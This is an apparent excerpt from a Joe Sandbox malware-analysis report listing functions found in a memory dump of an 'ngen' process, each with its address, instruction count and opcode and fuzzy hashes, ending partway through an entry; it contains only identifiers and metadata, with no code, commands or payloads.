                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                • Instruction ID: 87a682166c7ecaacbacaad815036b8dc14761244bfe1439c79a7635d0a87b81f
                                                • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                • Instruction Fuzzy Hash: 5FC08C72242A806AFF2B5760C904F3C3650BB1060AF98099CAE45F94A1CB689C028218
                                                Function 05880750 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction ID: 37b29ac0550f797059d4f1bc70e08bc0e648505c17a3e065d064b8bc9d8cfa3a
                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction Fuzzy Hash: 38C04C75751A458FCF15DB19D294F5577E4F744740F150890EC05DB721E624EC01CA11
                                                Function 058C4650 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d11a881f4ee7b2f5ccef9fbf03d8be18565c2cad7675a683bb3a4c4c51b840fe
                                                • Instruction ID: 2e6f84f9414146dcf09983e5a9b6d32d1cc371a63912e02617bdd8136aa959cb
                                                • Opcode Fuzzy Hash: d11a881f4ee7b2f5ccef9fbf03d8be18565c2cad7675a683bb3a4c4c51b840fe
                                                • Instruction Fuzzy Hash: 2E90026670151046414071584844406A16597E13013D5C115A5558560C861C8D59967A
                                                Function 058C3090 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b418f04a9624884d0c3089e638a98fe60b678fc92c10adae7a7b8e7b6a94eae
                                                • Instruction ID: 51aa7cbec82f51ea1649aaa853018375080d1ee04428e18d8104b867b310b787
                                                • Opcode Fuzzy Hash: 5b418f04a9624884d0c3089e638a98fe60b678fc92c10adae7a7b8e7b6a94eae
                                                • Instruction Fuzzy Hash: 6690022634141806D140715884547074166C7D0601F95C011A5028554D861A8E696AB2
                                                Function 058C3010 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a53312e665549d0922273fa7b9a2a13ac30312692fa8d6f67664e893106d3f57
                                                • Instruction ID: 4e7b2f5286d81bdb9c8427ab383059ba07aeb67e7e59ddfb18627e64fd96ad95
                                                • Opcode Fuzzy Hash: a53312e665549d0922273fa7b9a2a13ac30312692fa8d6f67664e893106d3f57
                                                • Instruction Fuzzy Hash: F790022630185446D14072584844B0F826587E1202FD5C019A915A554CC9198D595B32
                                                Function 058C4340 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3fed0b53299b0d76dcad2cc4d004f1726a6bc66ba5abe4b3f75c83e8f242a1f7
                                                • Instruction ID: 2ec687c182b35b2679de832b889812a9075ece3542d80deb6649aef055979654
                                                • Opcode Fuzzy Hash: 3fed0b53299b0d76dcad2cc4d004f1726a6bc66ba5abe4b3f75c83e8f242a1f7
                                                • Instruction Fuzzy Hash: CF900236705810169140715848C4546816597E0301B95C011E5428554C8A188E5A5772
                                                Function 058C2DB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 209c3dbdae1fe2655472281dc881d932bea8ce12f349c4fb6f0cd73a384f5f30
                                                • Instruction ID: bbf8ba88a1fb274a59711b18a01f4ca5c61e453653b30b8a8368fd4fb861e519
                                                • Opcode Fuzzy Hash: 209c3dbdae1fe2655472281dc881d932bea8ce12f349c4fb6f0cd73a384f5f30
                                                • Instruction Fuzzy Hash: FE90023634141406D14171584444606416997D0241FD5C012A5428554E86598F5AAE72
                                                Function 058C2DD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9afe19f98d1744c6beb7c23f8d3e80d49b7f399c1cfe7910cc161b7223909a95
                                                • Instruction ID: 80777464f571585b228dbded3418b91e4379c2ed1bde3d19b9f7f16d6d64267c
                                                • Opcode Fuzzy Hash: 9afe19f98d1744c6beb7c23f8d3e80d49b7f399c1cfe7910cc161b7223909a95
                                                • Instruction Fuzzy Hash: C0900226342451565545B1584444507816697E02417D5C012A6418950C852A9D5ADA32
                                                Function 058C2D00 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26836ee523dd6df65d0daf59526ba70a3f8ec7978359f8ffc2b4fdc09c2f4dd8
                                                • Instruction ID: 6eee2d5bd513c969c15747496f5de73b317ab35cf18f2912cf08b23457f3e30f
                                                • Opcode Fuzzy Hash: 26836ee523dd6df65d0daf59526ba70a3f8ec7978359f8ffc2b4fdc09c2f4dd8
                                                • Instruction Fuzzy Hash: 7290022630545446D10075585448A06416587D0205F95D011A6068595DC6398D55A532
                                                Function 058C3D10 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65c63e565e975b3984c565cc54ecd5e5ec9549b27ce8207656a5b7470801035b
                                                • Instruction ID: 95f6c9a8a549eca58271ae1e5c3fd449f1c35297952be0ec60b8e831e78e60a8
                                                • Opcode Fuzzy Hash: 65c63e565e975b3984c565cc54ecd5e5ec9549b27ce8207656a5b7470801035b
                                                • Instruction Fuzzy Hash: B890023630241146954072585844A4E826587E1302BD5D415A5019554CC9188D655632
                                                Function 058C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc4ebe19312d6cfb1172918c24592d4d254a05ff4b0b85bc1421c37cfd1d4dc7
                                                • Instruction ID: 7af9602417d6e23a4bbf4406c33290eaaf3951b048b3285e28e4960dd63e3798
                                                • Opcode Fuzzy Hash: dc4ebe19312d6cfb1172918c24592d4d254a05ff4b0b85bc1421c37cfd1d4dc7
                                                • Instruction Fuzzy Hash: E890022E31341006D1807158544860A416587D1202FD5D415A5019558CC9198D6D5732
                                                Function 058C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0f7a5ae9733c5e02e84f17b2614ada2aedc4482680a1318921a33729a2f8ee1
                                                • Instruction ID: cdb26f6e227286b0473984a3b44261aa9c250de689be34566b23059fff1747fb
                                                • Opcode Fuzzy Hash: c0f7a5ae9733c5e02e84f17b2614ada2aedc4482680a1318921a33729a2f8ee1
                                                • Instruction Fuzzy Hash: D790022630141007D140715854586068165D7E1301F95D011E5418554CD9198D5A5633
                                                Function 058C3D70 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 676a077adac283846c7b38997eb4e99502a5790418cab8ef55aa26f4dbeda841
                                                • Instruction ID: 56dcda3b9b0a9ce0799960809bf6b704669959123cc543715149e4b4812da1c0
                                                • Opcode Fuzzy Hash: 676a077adac283846c7b38997eb4e99502a5790418cab8ef55aa26f4dbeda841
                                                • Instruction Fuzzy Hash: BB90023A30141406D5107158584464641A687D0301F95D411A5428558D86588DA5A532
                                                Function 058C2CA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eeda772e3cd2e19724e297ce48c04bd1c2bc7314ecec749fba322a717390e4d8
                                                • Instruction ID: a78c4f149e33e8fed33722ac680547a12f99f960477c9d5f2fe9fb26a12dbc11
                                                • Opcode Fuzzy Hash: eeda772e3cd2e19724e297ce48c04bd1c2bc7314ecec749fba322a717390e4d8
                                                • Instruction Fuzzy Hash: 2490023630141406D10075985448646416587E0301F95D011AA028555EC6698D956532
                                                Function 058C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e183e4e52adc8fa6cc299f104d89f3f846638613e77cff123355728ec6adb47c
                                                • Instruction ID: 133d57a36cd9653ea4ff71393fe248b320ab727ce5aac701d2a297a408a00bcb
                                                • Opcode Fuzzy Hash: e183e4e52adc8fa6cc299f104d89f3f846638613e77cff123355728ec6adb47c
                                                • Instruction Fuzzy Hash: BA90022670541406D14071585458706417587D0201F95D011A5028554DC65D8F596AB2
                                                Function 058C2CF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 27fb6bb6c562e58551f8b886ea042f89610ffd7f5bfbd3895f7d36a7617e0862
                                                • Instruction ID: 8654dfbd9b569d95c42a966f1d4d6c7c21f5678f39e8c196197a6d2c0e2ededa
                                                • Opcode Fuzzy Hash: 27fb6bb6c562e58551f8b886ea042f89610ffd7f5bfbd3895f7d36a7617e0862
                                                • Instruction Fuzzy Hash: 0A90023630141407D10071585548707416587D0201F95D411A5428558DD65A8D556532
                                                Function 058C2C60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 961bc3d9715fb290119fa1602693e438510b45ab36fa92d7e690c0ca4f5c30f1
                                                • Instruction ID: 55a711580d31ed4bd4e8fbb2e0bea262d9e730a930e72696261648cf3c60bf43
                                                • Opcode Fuzzy Hash: 961bc3d9715fb290119fa1602693e438510b45ab36fa92d7e690c0ca4f5c30f1
                                                • Instruction Fuzzy Hash: 9790023630141846D10071584444B46416587E0301F95C016A5128654D8619CD557932
                                                Function 058C2F90 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a17654a6321a0cc2ba598ff2ec38de161320b4e67402765cea242c09379b42a
                                                • Instruction ID: a8a76ef46d38429bb5c85e5a3792ae1eda3d38ed171d4570baa7b98a744dcbc8
                                                • Opcode Fuzzy Hash: 4a17654a6321a0cc2ba598ff2ec38de161320b4e67402765cea242c09379b42a
                                                • Instruction Fuzzy Hash: AA90023630181406D1007158485470B416587D0302F95C011A6168555D86298D556972
                                                Function 058C2FA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                • Instruction ID: 63bec600236497022134753adea615de5efaef7c3534b29272ab9fbe87ef28f0
                                                • Opcode Fuzzy Hash: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                • Instruction Fuzzy Hash: 4290023630181406D10071584848747416587D0302F95C011AA168555E8669CD956932
                                                Function 058C2FB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                • Instruction ID: 35196ec29855047fd303dfa2815cd6001acebc040e89584b407f942967f90691
                                                • Opcode Fuzzy Hash: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                • Instruction Fuzzy Hash: 99900226701410464140716888849068165ABE1211795C121A599C550D855D8D695A76
                                                Function 058C2FE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                • Instruction ID: 076d06649f0bb863efb2c68677fe0ad041fefa780b13b3217dce8012c366944a
                                                • Opcode Fuzzy Hash: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                • Instruction Fuzzy Hash: 6D900226311C1046D20075684C54B07416587D0303F95C115A5158554CC9198D655932
                                                Function 058C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                • Instruction ID: 2c7ff88f4bd3b78df9bc7978d92964115453eace1cbc3e6afb88059d8e3dca52
                                                • Opcode Fuzzy Hash: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                • Instruction Fuzzy Hash: 8490026634141446D10071584454B064165C7E1301F95C015E6068554D861DCD566537
                                                Function 058C2F60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                • Instruction ID: 6f1977711fdf9236d4c52d9bd34bc22c56445acf8c8da7e6de7cfc7de8306834
                                                • Opcode Fuzzy Hash: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                • Instruction Fuzzy Hash: 9F90026631141046D1047158444470641A587E1201F95C012A7158554CC52D8D655536
                                                Function 058C2E80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                • Instruction ID: e73fe5ccc357356f5cac764e49ebc56a20e155419506f5fdde94e9e8e7bb17d0
                                                • Opcode Fuzzy Hash: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                • Instruction Fuzzy Hash: B590022670141506D10171584444616416A87D0241FD5C022A6028555ECA298E96A532
                                                Function 058C2EA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57bdc23524c0d6cd8405ae590895bd537270e6fc0682abea0a71e8baa524ef30
                                                • Instruction ID: f10a36b35e1ac487c77c9605fd577e34a3e73a504781c10bf26aa296ee6269f1
                                                • Opcode Fuzzy Hash: 57bdc23524c0d6cd8405ae590895bd537270e6fc0682abea0a71e8baa524ef30
                                                • Instruction Fuzzy Hash: 5790027630141406D14071584444746416587D0301F95C011AA068554E865D8ED96A76
                                                Function 058C2EE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af47f74db09e85ebe3c2a2ee3e88d83f96a25e6acb18a92858958298792f658
                                                • Instruction ID: bdd0160877ca3c05706b614ff8ee1dc0ded489c3953f809c3a662e32ea34b1be
                                                • Opcode Fuzzy Hash: 7af47f74db09e85ebe3c2a2ee3e88d83f96a25e6acb18a92858958298792f658
                                                • Instruction Fuzzy Hash: 8790026630181407D14075584844607416587D0302F95C011A7068555E8A2D8D556536
                                                Function 058C2E30 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f931ddd4a364afc13b9c6047e31db8fc0d9fb86475ba5d13028db5da5e17ccf3
                                                • Instruction ID: 7f2fc765ab6f0fe78d9a201fe1979d7612ea8817c95a3a6ca5148352f6ec221c
                                                • Opcode Fuzzy Hash: f931ddd4a364afc13b9c6047e31db8fc0d9fb86475ba5d13028db5da5e17ccf3
                                                • Instruction Fuzzy Hash: 4790022630141406D102715844546064169C7D1345FD5C012E6428555D86298E57A533
                                                Function 058C39B0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbdb2dc2da760e970e177c47cb56c06b06846ebec01da1790c88fa009f44760b
                                                • Instruction ID: 6170115a24d55ef439fd8632e6d62cf4b830c8aa07fa09f2168057886920c0c2
                                                • Opcode Fuzzy Hash: dbdb2dc2da760e970e177c47cb56c06b06846ebec01da1790c88fa009f44760b
                                                • Instruction Fuzzy Hash: D190022634546106D150715C44446168165A7E0201F95C021A5818594D85598D596632
                                                Function 058C2B80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 408635c266067271b3f05d23bf1c799e74ef107286ac5219f4c22b30e4320779
                                                • Instruction ID: 1fa0ffa6be2c4802569d8444a158983cd65fb459e0d4debff1013a3faa00a1c7
                                                • Opcode Fuzzy Hash: 408635c266067271b3f05d23bf1c799e74ef107286ac5219f4c22b30e4320779
                                                • Instruction Fuzzy Hash: 4A90023630141806D10471584844686416587D0301F95C011AB028655E96698D957532
                                                Function 058C2BA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fa80dbad05db6722f3871421930f135550f36eafdde21d5c043699fc8208888
                                                • Instruction ID: 4fd6bf1631be82dff9306ece0a15ef12c2be6c5cadc597450738a4491543d63f
                                                • Opcode Fuzzy Hash: 4fa80dbad05db6722f3871421930f135550f36eafdde21d5c043699fc8208888
                                                • Instruction Fuzzy Hash: 6090023670541806D15071584454746416587D0301F95C011A5028654D87598F597AB2
                                                Function 058C2BE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c7368f3e9d12d93b40a012e3231dd9a8c7cf31a52981e59568102b787a85e24
                                                • Instruction ID: 09dfcaff3c26619f44f0f0698c112113010e2361b0cfae6764f4b555a6dd72eb
                                                • Opcode Fuzzy Hash: 5c7368f3e9d12d93b40a012e3231dd9a8c7cf31a52981e59568102b787a85e24
                                                • Instruction Fuzzy Hash: B290023630545846D14071584444A46417587D0305F95C011A5068694D96298E59BA72
                                                Function 058C2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ca2c2960879e5dae6fbb0942ee1fc23d81d3cb67c19c92ba7a3819770c611c7
                                                • Instruction ID: 949777aa5ca4a8a589c69ef097c4084df54cd823a200bdf9c1b724e87721edf2
                                                • Opcode Fuzzy Hash: 0ca2c2960879e5dae6fbb0942ee1fc23d81d3cb67c19c92ba7a3819770c611c7
                                                • Instruction Fuzzy Hash: 4790023630141806D1807158444464A416587D1301FD5C015A5029654DCA198F5D7BB2
                                                Function 058C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c05e7b037d4959e42e3f00c8426eac82a8dbb26dce750c2e8d0068f82de73810
                                                • Instruction ID: e7219ba8c2d2a48c5a3eb8896d64a3a7d355f047cfa1208903dc1444de1b5000
                                                • Opcode Fuzzy Hash: c05e7b037d4959e42e3f00c8426eac82a8dbb26dce750c2e8d0068f82de73810
                                                • Instruction Fuzzy Hash: E59002A6301550964500B2588444B0A866587E0201B95C016E6058560CC5298D559536
                                                Function 058C2AD0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 032d788cf3a5234144e0f9db3a149d3987f943d63ff93e14b74c513b81475c19
                                                • Instruction ID: 2aadb0db10ad88967ee73f35420036ff6bdb5c42ea3b23cd7a4c14c6d85b5beb
                                                • Opcode Fuzzy Hash: 032d788cf3a5234144e0f9db3a149d3987f943d63ff93e14b74c513b81475c19
                                                • Instruction Fuzzy Hash: D890022A311410070105B558074450741A687D5351395C021F6019550CD6258D655532
                                                Function 058C2AF0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94a691114064afd3b06f4a7249f037653bb0ce1c10124f33504767564478e7fc
